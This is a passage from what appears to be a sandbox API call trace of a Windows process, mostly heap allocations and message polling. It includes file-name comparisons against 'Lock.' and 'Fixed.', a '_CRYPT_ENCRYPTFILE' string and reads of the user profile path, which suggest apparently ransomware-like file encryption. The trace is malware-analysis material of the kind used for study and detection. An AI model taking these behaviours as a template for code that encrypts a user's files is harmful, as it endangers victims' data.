hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0256.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0256.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0256.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0256.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yuOTM-ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uOTM-ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OTM-ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TM-ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M-ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ydpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dpavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pavUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vUWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UWyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WyQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yQnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QnpT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="npT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pT.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0256.290] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0256.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0256.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0256.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e55c70 [0256.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yuOTM-ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uOTM-ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OTM-ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TM-ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M-ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ydpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dpavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pavUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vUWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UWyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WyQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yQnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QnpT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="npT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pT.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0256.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0256.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0256.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0256.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0256.291] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0256.292] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.292] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0256.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0256.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0256.293] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0256.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0256.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0256.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0256.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0256.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0256.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0256.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0256.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0256.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0256.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0256.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0256.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0256.296] RtlAllocateHeap 